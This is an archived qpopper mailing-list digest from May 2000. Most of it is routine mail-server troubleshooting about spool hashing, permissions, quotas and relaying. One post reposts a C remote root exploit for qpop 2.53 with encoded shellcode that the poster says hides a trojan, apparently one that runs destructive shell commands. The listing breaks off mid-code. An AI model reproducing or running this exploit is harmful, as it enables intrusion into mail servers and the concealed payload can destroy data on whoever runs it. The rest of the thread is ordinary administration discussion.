The qpopper list archive ending on 16 May 2000
Topics covered in this issue include:
1. --enable-hash-spool=2
Brad Groshok <bgroshok at odyssey.on dot ca>
Thu, 11 May 2000 14:25:24 -0400
2. Re: --enable-hash-spool=2
Vinay Bharel <vinay at bharel dot com>
Thu, 11 May 2000 11:40:42 -0700 (PDT)
3. Re: --enable-hash-spool=2
Vinay Bharel <vinay at bharel dot com>
Thu, 11 May 2000 16:10:49 -0700 (PDT)
4. Re: --enable-hash-spool=2
Peter Evans <peter at gol dot com>
Fri, 12 May 2000 08:21:09 +0900
5. Re: --enable-hash-spool=2
Kip Turk <kipt at wcc dot net>
Fri, 12 May 2000 07:50:39 -0500 (CDT)
6. Kerberos 5 for qpopper
Ken Hornstein <kenh at cmf.nrl.navy dot mil>
Fri, 12 May 2000 11:16:00 -0400
7. Re: --enable-hash-spool=2
Qpopper Support <qpopper at qualcomm dot com>
Fri, 12 May 2000 22:50:10 -0700
8. Standalone Directions
"J.D. Bronson" <jdb at coors.xpec dot com>
Sat, 13 May 2000 15:05:57 -0500
9. Running qpopper on OpenBSD
"J.D. Bronson" <jdb at coors.xpec dot com>
Sat, 13 May 2000 15:08:42 -0500
10. Re: Running qpopper on OpenBSD
Qpopper Support <qpopper at qualcomm dot com>
Sat, 13 May 2000 16:45:12 -0700
11. Daemonizing Qpopper and securing...
Kevin Dabson <kevin at dnc-electronics dot com>
Sun, 14 May 2000 18:52:25 GMT
12. Qpopper3.0.1 and MailMan
Butch Kemper <kemper at tstar dot net>
Sun, 14 May 2000 17:04:51 -0500
13. Not running
Metagents at aol dot com
Sun, 14 May 2000 20:09:49 EDT
14. qpopper and mail quota
"bolero lee" <bolero92 at hotmail dot com>
Mon, 15 May 2000 08:03:56 GMT
15. NONAUTHFILE message
Raphael Maseko <ralph at zamnet dot zm>
Mon, 15 May 2000 10:49:24 +0200
16. TecKnow and KnowNet Weaver
SDNP-India <sdnp at envfor.delhi.nic dot in>
Mon, 15 May 2000 15:02:48 +0500
17. Re: Qpopper 3.0.1 (final) available (X-UIDL format)
Andrew J Cole <A.J.Cole at cbl.leeds.ac dot uk>
Mon, 15 May 2000 12:04:25 +0100 (BST)
18. Re: qpopper and mail quota
"Joseph W. Breu" <breu at cfu dot net>
Mon, 15 May 2000 07:32:50 -0500 (CDT)
19. qpop 2.53
Alexander Kuznetsov <alex at sitek dot net>
Mon, 15 May 2000 16:56:45 +0400
20. Allowing only certain people to sendmail.
Tony Kim <tonyk at canadashop dot com>
Mon, 15 May 2000 08:01:27 -0600
21. Re: Allowing only certain people to sendmail.
Christopher Cramer <cec at ee.duke dot edu>
Mon, 15 May 2000 10:18:50 -0400 (EDT)
22. Re: Allowing only certain people to sendmail.
Frank Pineau <frank at pineaus dot com>
Mon, 15 May 2000 10:33:30 -0400
23. AW: Allowing only certain people to sendmail.
"Martin Bene" <mb at sime dot com>
Mon, 15 May 2000 17:00:21 +0200
24. Re: Allowing only certain people to sendmail.
Christopher Cramer <cec at ee.duke dot edu>
Mon, 15 May 2000 11:11:31 -0400 (EDT)
25. Re: Allowing only certain people to sendmail.
Forrest Aldrich <forrie at forrie dot com>
Mon, 15 May 2000 11:29:49 -0400
26. Re: Qpopper 3.0.1 (final) available (X-UIDL format)
Qpopper Support <qpopper at qualcomm dot com>
Mon, 15 May 2000 09:37:27 -0700
27. Re: Allowing only certain people to sendmail.
Alan Brown <alan at manawatu.gen dot nz>
Tue, 16 May 2000 05:15:20 +1200 (NZST)
28. Re: AW: Allowing only certain people to sendmail.
Alan Brown <alan at manawatu.gen dot nz>
Tue, 16 May 2000 05:26:38 +1200 (NZST)
29. off-topic: Allowing only certain people to sendmail.
Daniel Norton <danorton at chsw dot com>
Mon, 15 May 2000 14:29:10 -0400
30. Re: off-topic: Allowing only certain people to sendmail.
Frank Pineau <frank at pineaus dot com>
Mon, 15 May 2000 14:43:30 -0400
31. Re: off-topic: Allowing only certain people to sendmail.
"Julian Y. Koh" <kohster at mac dot com>
Mon, 15 May 2000 13:48:26 -0500
32. Re: off-topic: Allowing only certain people to sendmail.
Ken Hornstein <kenh at cmf.nrl.navy dot mil>
Mon, 15 May 2000 14:59:28 -0400
33. Re: off-topic: Allowing only certain people to sendmail.
Daniel Norton <danorton at chsw dot com>
Mon, 15 May 2000 15:23:03 -0400
34. Re: off-topic: Allowing only certain people to sendmail.
Frank Pineau <frank at pineaus dot com>
Mon, 15 May 2000 15:33:28 -0400
35. Allowing only certain people to sendmail.
Tony Kim <tonyk at canadashop dot com>
Mon, 15 May 2000 13:39:43 -0600
36. Whoops... qpopper3.0.1 question (subject was wrong last msg)
Tony Kim <tonyk at canadashop dot com>
Mon, 15 May 2000 13:53:16 -0600
37. popper ver 3.0.1 logfile error messages???
Brad Groshok <bgroshok at odyssey.on dot ca>
Mon, 15 May 2000 21:16:23 -0400
38. Re: off-topic: Allowing only certain people to sendmail.
Alan Brown <alan at manawatu.gen dot nz>
Tue, 16 May 2000 13:46:18 +1200 (NZST)
39. Re: Qpopper3.0.1 and MailMan
Qpopper Support <qpopper at qualcomm dot com>
Mon, 15 May 2000 18:41:47 -0700
40. Re: Whoops... qpopper3.0.1 question (subject was wrong last
Qpopper Support <qpopper at qualcomm dot com>
Mon, 15 May 2000 18:47:47 -0700
41. Re: popper ver 3.0.1 logfile error messages???
Qpopper Support <qpopper at qualcomm dot com>
Mon, 15 May 2000 18:54:24 -0700
42. Re: qpop 2.53
Qpopper Support <qpopper at qualcomm dot com>
Mon, 15 May 2000 19:10:07 -0700
43. Re: Not running
"James Nelson" <james at digit.bloomnet dot com>
Mon, 15 May 2000 23:17:14 -0500
44. Re: popper ver 3.0.1 logfile error messages???
Admin Mailing Lists <mlist at intergrafix dot net>
Tue, 16 May 2000 08:58:25 -0400 (EDT)
45. Question
fatemeh at dpi.net dot ir
Tue, 16 May 2000 17:47:53 +0330
46. qpopper3.0 install on Solaris 7
"Gregory Hall" <Ghall at HAI dot COM>
Tue, 16 May 2000 11:25:12 -0400
47. Re: Question
Ken Hornstein <kenh at cmf.nrl.navy dot mil>
Tue, 16 May 2000 09:58:16 -0400
48. Re: qpopper3.0 install on Solaris 7
Eric Hunter <ehunter at netrover dot com>
Tue, 16 May 2000 13:08:46 -0400
49. Re: qpopper3.0 install on Solaris 7
Christopher Cramer <cec at ee.duke dot edu>
Tue, 16 May 2000 13:13:07 -0400 (EDT)
50. Re: Not running
Joel Laing <joel at scripps dot edu>
Tue, 16 May 2000 10:33:25 -0700
Date: Thu, 11 May 2000 14:25:24 -0400
From: Brad Groshok <bgroshok at odyssey.on dot ca>
Subject: --enable-hash-spool=2
Hello all...
I've just built qpopper 3.0 with the --enable-hash-spool=2 configure
switch, which appears to be working just fine.
Sorry to ask this question here, but can someone point me to info on
configuring sendmail to deliver mail to the /var/mail/x/x/ directories?
(something more specific than www.sendmail.org please) :-)
I've been bouncing through the sendmail site but have not found it yet.
Someone on this list has prolly gone down this path already.
or is this maybe something that the local delivery mail agent needs to have
modified.
If so any pointers there would also be greatly appreciated.
Running Sun Solaris 2.8 (Sparc)
Sendmail 8.10.1, Qpopper 3.0
TIA
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
_/ Regards: Brad Groshok (bgroshok at odyssey.on dot ca) _/
_/ President Odyssey Network Inc. http://www.odyssey.on.ca _/
_/ London Ontario Canada PH:(519)660-8883 Fax:(519)660-6111 _/
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Date: Thu, 11 May 2000 11:40:42 -0700 (PDT)
From: Vinay Bharel <vinay at bharel dot com>
Subject: Re: --enable-hash-spool=2
You would need to use a MDA that can do this. Procmail is the most popular
one.
I have not use a mailspoolhash but I remember seeing the option in
procmail.
Get the procmail source and look in src/authenticate.c
It should have something like:
#define MAILSPOOLHASH 0
I believe you can just set this to whatever you want.
---
Vinay Bharel
vinay at bharel dot com
http://www.bharel.com
On Thu, 11 May 2000, Brad Groshok wrote:
> Hello all...
>
> I've just built qpopper 3.0 with the --enable-hash-spool=2 configure
> switch, which appears to be working just fine.
>
> Sorry to ask this question here, but can someone point me to info on
> configuring sendmail to deliver mail to the /var/mail/x/x/ directories?
>
> (something more specific than www.sendmail.org please) :-)
> I've been bouncing through the sendmail site but have not found it yet.
> Someone on this list has prolly gone down this path already.
>
> or is this maybe something that the local delivery mail agent needs to have
> modified.
> If so any pointers there would also be greatly appreciated.
>
> Running Sun Solaris 2.8 (Sparc)
> Sendmail 8.10.1, Qpopper 3.0
>
> TIA
>
> _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
> _/ Regards: Brad Groshok (bgroshok at odyssey.on dot ca) _/
> _/ President Odyssey Network Inc. http://www.odyssey.on.ca _/
> _/ London Ontario Canada PH:(519)660-8883 Fax:(519)660-6111 _/
> _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
>
Date: Thu, 11 May 2000 16:10:49 -0700 (PDT)
From: Vinay Bharel <vinay at bharel dot com>
Subject: Re: --enable-hash-spool=2
I just tried it and it works quite nicely. I used level 2 hash and it now
delivers to /var/spool/mail/v/i/vinay . Although how it would be kinda
hard to make all the directories by hand. Is there any automated way of
doing this?
---
Vinay Bharel
vinay at bharel dot com
http://www.bharel.com
On Thu, 11 May 2000, Vinay Bharel wrote:
> You would need to use a MDA that can do this. Procmail is the most popular
> one.
>
> I have not use a mailspoolhash but I remember seeing the option in
> procmail.
>
> Get the procmail source and look in src/authenticate.c
>
> It should have something like:
>
> #define MAILSPOOLHASH 0
>
> I believe you can just set this to whatever you want.
>
> ---
> Vinay Bharel
> vinay at bharel dot com
> http://www.bharel.com
>
> On Thu, 11 May 2000, Brad Groshok wrote:
>
> > Hello all...
> >
> > I've just built qpopper 3.0 with the --enable-hash-spool=2 configure
> > switch, which appears to be working just fine.
> >
> > Sorry to ask this question here, but can someone point me to info on
> > configuring sendmail to deliver mail to the /var/mail/x/x/ directories?
> >
> > (something more specific than www.sendmail.org please) :-)
> > I've been bouncing through the sendmail site but have not found it yet.
> > Someone on this list has prolly gone down this path already.
> >
> > or is this maybe something that the local delivery mail agent needs to have
> > modified.
> > If so any pointers there would also be greatly appreciated.
> >
> > Running Sun Solaris 2.8 (Sparc)
> > Sendmail 8.10.1, Qpopper 3.0
> >
> > TIA
> >
> > _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
> > _/ Regards: Brad Groshok (bgroshok at odyssey.on dot ca) _/
> > _/ President Odyssey Network Inc. http://www.odyssey.on.ca _/
> > _/ London Ontario Canada PH:(519)660-8883 Fax:(519)660-6111 _/
> > _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
> >
>
Date: Fri, 12 May 2000 08:21:09 +0900
From: Peter Evans <peter at gol dot com>
Subject: Re: --enable-hash-spool=2
Vinay Bharel (vinay at bharel dot com) wrote:
> I just tried it and it works quite nicely. I used level 2 hash and it now
> delivers to /var/spool/mail/v/i/vinay . Although how it would be kinda
> hard to make all the directories by hand. Is there any automated way of
> doing this?
Your delivery program should be doing this, be it mail.local
or procmail.
Since I use a messy hash and no real users, I have mail.local
making the hash directories as it delivers.
/shared/spool/154/462/b8.peter
For example. ^_^;
P
--
Remember The 5 K's.
The Justified Agents of Munya-munya-muuuu ...
Date: Fri, 12 May 2000 07:50:39 -0500 (CDT)
From: Kip Turk <kipt at wcc dot net>
Subject: Re: --enable-hash-spool=2
Here is the script I made to do it:
#!/usr/bin/perl
@directories = ("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k",
"l", "m", "n", "o", "p", "q", "r", "s",
"t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7",
"8", "9", "-", "_");
$loop1 = 0;
$loop2 = 0;
while ($loop1 <= $#directories) {
`mkdir /var/spool/mail/$directories[$loop1]`;
while ($loop2 <= $#directories) {
`mkdir
/var/spool/mail/$directories[$loop1]/$directories[$loop2]`;
`chmod 1777
/var/spool/mail/$directories[$loop1]/$directories[$loop2]`;
++$loop2;
}
`chown -R root:mail /var/spool/mail2/$directories[$loop1]`;
`chmod 1777 /var/spool/mail2/$directories[$loop1]`;
++$loop1;
$loop2 = 0;
}
exit;
#=================== End code ========================
We had some users starting with digits and some with - and _ as the second
character, so I created all those directories. Remove anything you don't
need created from the @loop.
Cheers,
--
===============================================
Kip Turk phone: 915.234.5678
Systems Administrator or 800.695.9016
West Central Net fax: 915.656.0071
===============================================
On Thu, 11 May 2000, Vinay Bharel wrote:
> I just tried it and it works quite nicely. I used level 2 hash and it now
> delivers to /var/spool/mail/v/i/vinay . Although how it would be kinda
> hard to make all the directories by hand. Is there any automated way of
> doing this?
>
> ---
> Vinay Bharel
> vinay at bharel dot com
> http://www.bharel.com
>
> On Thu, 11 May 2000, Vinay Bharel wrote:
>
> > You would need to use a MDA that can do this. Procmail is the most popular
> > one.
> >
> > I have not use a mailspoolhash but I remember seeing the option in
> > procmail.
> >
> > Get the procmail source and look in src/authenticate.c
> >
> > It should have something like:
> >
> > #define MAILSPOOLHASH 0
> >
> > I believe you can just set this to whatever you want.
> >
> > ---
> > Vinay Bharel
> > vinay at bharel dot com
> > http://www.bharel.com
> >
> > On Thu, 11 May 2000, Brad Groshok wrote:
> >
> > > Hello all...
> > >
> > > I've just built qpopper 3.0 with the --enable-hash-spool=2 configure
> > > switch, which appears to be working just fine.
> > >
> > > Sorry to ask this question here, but can someone point me to info on
> > > configuring sendmail to deliver mail to the /var/mail/x/x/ directories?
> > >
> > > (something more specific than www.sendmail.org please) :-)
> > > I've been bouncing through the sendmail site but have not found it yet.
> > > Someone on this list has prolly gone down this path already.
> > >
> > > or is this maybe something that the local delivery mail agent needs to have
> > > modified.
> > > If so any pointers there would also be greatly appreciated.
> > >
> > > Running Sun Solaris 2.8 (Sparc)
> > > Sendmail 8.10.1, Qpopper 3.0
> > >
> > > TIA
> > >
> > > _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
> > > _/ Regards: Brad Groshok (bgroshok at odyssey.on dot ca) _/
> > > _/ President Odyssey Network Inc. http://www.odyssey.on.ca _/
> > > _/ London Ontario Canada PH:(519)660-8883 Fax:(519)660-6111 _/
> > > _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
> > >
> >
>
>
Subject: Kerberos 5 for qpopper
Date: Fri, 12 May 2000 11:16:00 -0400
From: Ken Hornstein <kenh at cmf.nrl.navy dot mil>
I've recently updated some patches I had for doing Kerberos 5 KPOP for
the qpopper 3.0.1; is anyone interested in them? Better yet .... any way
I could convince qualcomm to take these changes back?
(My next step is to add support for the Cyrus SASL library .... now if
only Eudora would support the GSSAPI SASL mechanism :-/).
--Ken
Date: Fri, 12 May 2000 22:50:10 -0700
From: Qpopper Support <qpopper at qualcomm dot com>
Subject: Re: --enable-hash-spool=2
At 4:10 PM -0700 5/11/00, Vinay Bharel wrote:
> Although how it would be kinda
> hard to make all the directories by hand. Is there any automated way of
> doing this?
Qpopper creates the directories on the fly if they don't already
exist. The local delivery agent should do the same.
Date: Sat, 13 May 2000 15:05:57 -0500
From: "J.D. Bronson" <jdb at coors.xpec dot com>
Subject: Standalone Directions
Does anyone have a step by step email for setting (via compile) up qpopper
to run in standalone outside of inetd?
I have 2 platforms...
OpenBSD and Solaris
I have dug thru the archives, but nothing is concrete...only some hints...
Thanx!
--
Jeff Bronson // jeff at xpec.com // http://www.xpec dot com
Aurora Health Care // Information Systems // Telecom Site Manager
Milwaukee Wisconsin USA // Office: 414.978.3999 // Fax: 414.328.8787
Date: Sat, 13 May 2000 15:08:42 -0500
From: "J.D. Bronson" <jdb at coors.xpec dot com>
Subject: Running qpopper on OpenBSD
It compiled fine....however this is what happens when you try to access
qpopper:
Escape character is '^]'.
+OK QPOP (version 3.0.1) at icehouse.xpec.com starting.
user jeff
+OK Password required for jeff.
pass xxxxxxxx
-ERR [SYS/TEMP] Failed to create /var/mail/.jeff.pop with uid 1001, gid 0.
Change permissions.
+OK Pop server at icehouse.xpec.com signing off.
Connection closed by foreign host.
this does not happen on my other box that runs Solaris....any hints?
Date: Sat, 13 May 2000 16:45:12 -0700
From: Qpopper Support <qpopper at qualcomm dot com>
Subject: Re: Running qpopper on OpenBSD
At 3:08 PM -0500 5/13/00, J.D. Bronson wrote:
> It compiled fine....however this is what happens when you try to access
> qpopper:
>
> Escape character is '^]'.
> +OK QPOP (version 3.0.1) at icehouse.xpec.com starting.
> user jeff
> +OK Password required for jeff.
> pass xxxxxxxx
> -ERR [SYS/TEMP] Failed to create /var/mail/.jeff.pop with uid 1001, gid 0.
> Change permissions.
> +OK Pop server at icehouse.xpec.com signing off.
> Connection closed by foreign host.
>
> this does not happen on my other box that runs Solaris....any hints?
Check the permissions on /var/mail. See the FAQ "How do I set the
correct ownership and permissions on the spool directory?" at
<http://www.eudora.com/qpopper/faq.html#permissions>.
Date: Sun, 14 May 2000 18:52:25 GMT
From: Kevin Dabson <kevin at dnc-electronics dot com>
Subject: Daemonizing Qpopper and securing...
I have setup popper in standalone mode on a LINUX system,
but I now want a daemon setup.
Anyone know how to go about doing this.
As far as I can make out popper 3 got hacked. I want to upgrade
very soon to a more secure version. Could do with some
assistance on best version...
I am currently experimenting with chroot command and
putting non existant shells in /etc/passwd for users
and it's immediate restriction on user access and
incorporating this on a popper system.
Something like /var/spool/mail/./ for home directory in /etc/passwd
and /bin/nonexist in shell to run also in /etc/passwd or a bash script
with a message.
(Did look at mySQL patches for popper/procmail etc but reluctant
to do this with sendmail!)
1, Does qpopper require user access both to spool directory
typically /var/spool/mail & home directory?
Or could I put spool in home directory along with attachments
and limit access to this directory?
2, What is the advantage of using pam authentication
over shadow passwords and md5? (In a system sense not
just popper)
3, Lastly, I am increasingly configuring server software in either
standalone or daemon modes. Obviously without the use of
inetd and tcp wrappers (tcpd) and etc hosts allow/deny
functionality, restricting non-network use can be a problem.
I need something like tcpd which will work with standalone programs
and daemon programs.
I have heard of the tcpserver program but unsure of what it
can do and how hard it is to configure.
Any help appreciatted.
KD
Date: Sun, 14 May 2000 17:04:51 -0500
From: Butch Kemper <kemper at tstar dot net>
Subject: Qpopper3.0.1 and MailMan
I have installed Qpopper 3.0.1 on Solaris and everything seems fine except
when Qpopper is accessed from the web server program MailMan. Qpopper logs
these messages each time the MailMan program accesses a mail box. When I
use Qpopper 3.0.1 to access the same mailbox with Eudora or directly by
telnet, there are no error messages.
May 14 13:01:31 orion popper3[28777]: EOF from kemper at 207.13.78.11
(mail-in.tstar.net): [0] 2 (No such file or directory); 0 (Error 0)
May 14 13:01:31 orion popper3[28777]: kemper at mail-in.tstar.net
(207.13.78.11): -ERR POP EOF or I/O Error: 11 (Resource temporarily
unavailable); 0 (Error 0)
I am currently using Qpopper 2.53 with MailMan and I do not see any
problems in the error log.
Do anyone have any suggestions?
Thanks.
Butch
TSTAR Internet, Inc | Making the Network Work
Marble Falls, TX | Serving Blanco, Burnet, and
830-693-6967 | Llano Counties
From: Metagents at aol dot com
Date: Sun, 14 May 2000 20:09:49 EDT
Subject: Not running
Hi All
I have installed qpopper 3.0 on Red Hat Linux 6.2 (new VA Linux machine), and
followed the directions exactly. I edited inetd.conf adding the line "pop3
stream tcp nowait root /usr/local/lib/popper qpopper -s" and get the
following line in my messages log:
"May 14 13:28:16 va inetd[6220]: execv /usr/local/lib/popper: Permission
denied"
When I try to telnet to the pop3 I get:
"Trying my.ip.address.102...
Connected to my.site.com.
Escape character is '^]'.
Connection closed by foreign host."
I tried the line from my old machine running qpopper which read
"pop-3 stream tcp nowait root /usr/sbin/tcpd
/usr/local/lib/popper/popper"
It worked on my old box running Red Hat 6.0, but doesn't work here.
Can someone help?
Thanks
MM
From: "bolero lee" <bolero92 at hotmail dot com>
Subject: qpopper and mail quota
Date: Mon, 15 May 2000 08:03:56 GMT
We have a quota on partition /var/mail
In case the disk usage exceeds the limit specified by the quota
users even cannot log on as qpopper daemon cannot write a lock file at
/var/mail
Is there any way for the user to delete their own mail
in case the mail quota exceeds?
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
Date: Mon, 15 May 2000 10:49:24 +0200
From: Raphael Maseko <ralph at zamnet dot zm>
Subject: NONAUTHFILE message
Hi All,
I have implemented NONAUTHFILE option in Qpopper 2.53 on FreeBSD and it
works fine, but I would like qpopper to return a more appropriate
message when a user in the exclusion file attempts to pick mail than
just rejecting of passwrd. The logs report " incorrect passoword for
user ABC". Any idea how I can make qpopper send a message such as
"Account disable, contact Administrator"?
Thanks in advace.
Raph
--
----------------------------------------------------------------------
Raphael Maseko -Communications Engineer, Email:ralph at zamnet dot zm
Zamnet Communications systems Ltd,
Box 22180, Kitwe, Zambia.
http://www.zamnet.zm
-----------------------------------------------------------------------
"Never ask two questions in a business letter. The reply will
discuss the one you are least interested in and say nothing about the
other"---Unknown
Date: Mon, 15 May 2000 15:02:48 +0500
From: SDNP-India <sdnp at envfor.delhi.nic dot in>
Subject: TecKnow and KnowNet Weaver
Dear Colleague
Welcome to KnowNet Initiative!
KnowNet or the Knowledge Network is a recent initiative to catalyse
formation of Knowledge Societies through the use of latest Information and
Communication Technologies.
KnowNet is an attempt towards recognising and putting a value to local
information and knowledge; bringing more and more local information into
the public domain and reducing the western-hemisphere and English Language
skew in the information available on the internet; building capacities of
people to manage local information and knowledge and use it for creation of
better opportunities; making an effort to identify niche areas where the
available information can be used for creating maximum impact to ensure
sustainable development; and empowering people to change power equations
(based on information and knowledge) to create more transparent and
responsive local governance structures.
I take this opportunity to introduce you to two new resources recently
developed under the KnowNet initiative. These are "KnowNet Weaver" and
"TechKnow."
"KnowNet Weaver" (http://www.knownetweaver.org) is a Tool Kit developed for
Communities, Non-Governmental Organisations and Individuals to host local
knowledge on the Information Superhighway to catalyse the process of
Knowledge Networking for Sustainable Development. KnowNet Weaver enables
you to create your own interactive website, give it a domain name and host
it on the World Wide Web (WWW) absolutely free-of-cost using freeware or
shareware available on the internet. You do not have to look elsewhere for
any other support to become a part of the information superhighway and reap
the advantages of knowledge networking. The kit is being currently
translated into languages other than English.
"TechKnow" is a remote website designing course for individuals,
organisations and
communities working towards sustainable development. Under TechKnow, remote
help is provided through emails to enable organisations and individuals to
design their websites absolutely free-of-cost. The course is also
available on the net at http://www.techknownet.org
To keep updated or more information about these two developments, send an
email at
knownet at knownetweaver dot org
Warm Regards
Vikas Nath
Innovator
KnowNet Initiative
email:knownet at knownetweaver dot org
URL: http://www.knownetweaver.org
URL: http://www.techknownet.org
Date: Mon, 15 May 2000 12:04:25 +0100 (BST)
From: Andrew J Cole <A.J.Cole at cbl.leeds.ac dot uk>
Subject: Re: Qpopper 3.0.1 (final) available (X-UIDL format)
Just upgraded from 2.53 to 3.0.1 (Sun OS 4.1.4) and noticed that the
X-UIDL: headers are now being generated incorrectly (probably from a
uninitialised structure).
Andrew
Date: Mon, 15 May 2000 07:32:50 -0500 (CDT)
From: "Joseph W. Breu" <breu at cfu dot net>
Subject: Re: qpopper and mail quota
On Mon, 15 May 2000, bolero lee wrote:
> We have a quota on partition /var/mail
>
> In case the disk usage exceeds the limit specified by the quota
> users even cannot log on as qpopper daemon cannot write a lock file at
> /var/mail
--enable-temp-drop-dir=/usr/local/tmp/ (or wherever you want the drop's to
be copied to).
--
Thanks,
-Joseph W. Breu
-----------------------------------------------------------------------
Joseph W. Breu Systems Administrator / Cedar Falls Utilities
phone: (319) 268-5228 Utility Parkway, Cedar Falls, Iowa 50613
pager: (319) 235-4209 NIC: jwb96 breu at cfu.net breu dot pager at cfu dot net
---- Al Gore: "...I took the initiative in creating the Internet. -----
Date: Mon, 15 May 2000 16:56:45 +0400
From: Alexander Kuznetsov <alex at sitek dot net>
Subject: qpop 2.53
this has been found in the wild, however there seems to be a trojan in the
shellcode. Popper 2.5* has been
thought to be safe. I would not reccomend running this on your own machine
unless you crack the shellcode
and see what it does.
bat
/* PRIVATE!!!!!!!!! DONT DISTRIBUTE!!!!! PRIVATE!!!!!!!!!
*
*
* qpop 2.53 remote root exploit for linux
* tested on redhat 6.x and 5.x, and slack7
* offsets for redhat 6: 100
* redhat 5: 150
*
* slackware: 200
*
* these offsets were an average, however the buffer is small and
* the address must almost be exact. Perhaps try a offset brute forcer.
*
* code by John Slockavich, copyright Febuary 25th, 2000
* this code for educational purposes only
*
*
*
* If this exploit is successful, you should have a bindshell on port 1524
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
#include <linux/ip.h>
#define RET 0xbffff6b2
#define NOP 0x90
#define PORT 110
#define BSIZE 512
int (*qpop_proc)();
void quit(int x);
char shellcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x8c\x01\x8
0\x36\x02\x46\xe2\xfa"
"\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f"
"\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x2d"
"\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22\x7e\x22"
"\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76\x61\x6d"
"\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c\x3c\x22"
"\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25\x29\x22"
"\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76\x71"
"\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c\x76\x70"
"\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d\x6d\x6e"
"\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63"
"\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70\x22\x2f"
"\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66\x67\x74"
"\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39\x22\x61"
"\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x39\x22"
"\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66\x67\x74"
"\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22\x2f\x70"
"\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02\x57\x8b"
"\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02\x02\x8f"
"\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6\x8f\x81"
"\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2\xba\x09"
"\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c\xcb\xc1"
"\x92\x92";
void usage(char *name)
{
fprintf(stderr,"qpop 2.53 exploit by John Slockavich\n"
"Usage: %s <hostname> <offset>\n"
, name);
exit(1);
}
int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *he;
char *hostname, *ptr, *buff;
char sendbuf[BSIZE+20];
long *addr_ptr, addr;
int rfd;
int sfd;
int i;
int offset = 0;
if (argc < 2)
usage(argv[0]);
hostname = argv[1];
if (argv[2])
offset = atoi(argv[2]);
(char *)qpop_proc = shellcode;
if (!(buff = malloc(BSIZE))) {
perror("malloc");
exit(0);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(PORT);
if ((he = gethostbyname(hostname)) == NULL) {
herror("resolve");
exit(0);
}
bcopy(he->h_addr, (struct in_addr *)&sin.sin_addr, he->h_length);
if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
perror("socket");
exit(1);
}
if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
exit(1);
}
addr = RET - offset;
printf("preparing buffer using addr 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < BSIZE; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < BSIZE/2; i++)
buff[i] = NOP;
ptr = buff + ((BSIZE/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[BSIZE - 1] = '\0';
if (connect(sfd, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect");
quit(1);
}
printf("connected, sending shellcode...\n");
